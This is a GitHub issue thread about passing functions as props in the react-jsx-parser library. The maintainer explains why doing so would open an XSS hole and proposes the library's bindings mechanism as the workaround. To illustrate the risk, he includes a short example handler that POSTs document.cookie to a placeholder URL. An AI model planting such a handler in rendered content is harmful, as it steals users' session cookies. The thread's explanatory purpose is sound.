### ISSUE TITLE
Passing function as a props

### ISSUE THREAD

**Issue by muhammadridho** [TroyAlford/react-jsx-parser#48]
Can i use function as a props, like this 

`<Tabs
                    clickHandler={function => console.log('this is function')}
                    widthTabItem={330}
                    scrollable={true}
                    classTabItem={'tab__item'}
                    classHeadTab={'tab__head'}
                    classTabContainer={'tab__container'}
                    tabItems={tabItems}
                    >
                  {(num) => <span>{ num } </span> }
                </Tabs>`

?

**Comment by TroyAlford** [comment]
No, there is no planned support for directly injecting a function in this fashion - because it would effectively become another form of `eval`, and thus open you up to XSS attacks. Consider a scenario in which you were to render JSX such as:

```
<Tabs clickHandler={() => { 
  fetch(`someurl`, { method: 'POST', body: JSON.stringify(document.cookie) })
}} />
```

Not a far stretch for use-cases where someone is dynamically rendering user-entered content and late-binding it as JSX (which is the primary use-case of this lib). In this scenario - a malicious user could convince your system to post the cookies of whatever user was rendering the content to some random server.

To work around this - I suggest the following approach:

```
const onTabClick = function => { console.log('this is a function') }
const renderTabChildren = num => <span>{num}</span>

<JsxParser
  bindings={{ onTabClick, renderTabChildren, tabItems }}
  jsx={`
    <Tabs
      children={renderTabChildren}
      classHeadTab="tab__head"
      classTabContainer="tab__container"
      classTabItem="tab__item"
      clickHandler={onTabClick}
      scrollable
      tabItems={tabItems}
      widthTabItem={330}
    />
  `}
/>
```

This works by providing a function which is injected as part of _your_ javascript, and late-bound to the component. When the parser runs across a symbol-binding of `renderTabChildren` - it will look at the `bindings` prop to see if it has a `bindings.renderTabChildren` - and if so, it will use it to fulfill the binding.

**Comment by muhammadridho** [comment]
Oh ok, thanks for for answering my question
